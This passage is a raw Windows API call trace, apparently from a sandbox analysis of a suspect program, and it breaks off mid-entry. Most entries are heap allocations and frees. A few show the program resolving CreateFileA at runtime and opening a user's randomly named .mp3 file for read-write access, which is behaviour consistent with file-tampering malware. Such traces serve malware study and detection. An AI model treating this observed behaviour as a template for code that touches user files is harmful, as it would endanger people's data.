RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0037.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.714] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.714] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0037.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0037.715] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0037.715] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.715] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.716] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.717] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.718] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cc10 [0037.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cc10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.718] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0037.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.718] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0037.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cc10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0037.718] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.719] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0037.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0037.719] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x45) returned 0x88e138 [0037.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3", cchWideChar=69, lpMultiByteStr=0x88e138, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3", lpUsedDefaultChar=0x0) returned 69 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.719] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.719] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\7d68killni\\shi6u88nczyga2zyk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8a) returned 0x7c38b0 [0037.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=69, lpWideCharStr=0x7c38b0, cchWideChar=69 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\7d68KILlni\\SHI6u88nCZyGa2ZYK.mp3") returned 69 [0037.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0037.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0037.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.720] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.720] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.721] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.721] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.721] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.722] HeapFree (in: hHeap=0x770000, 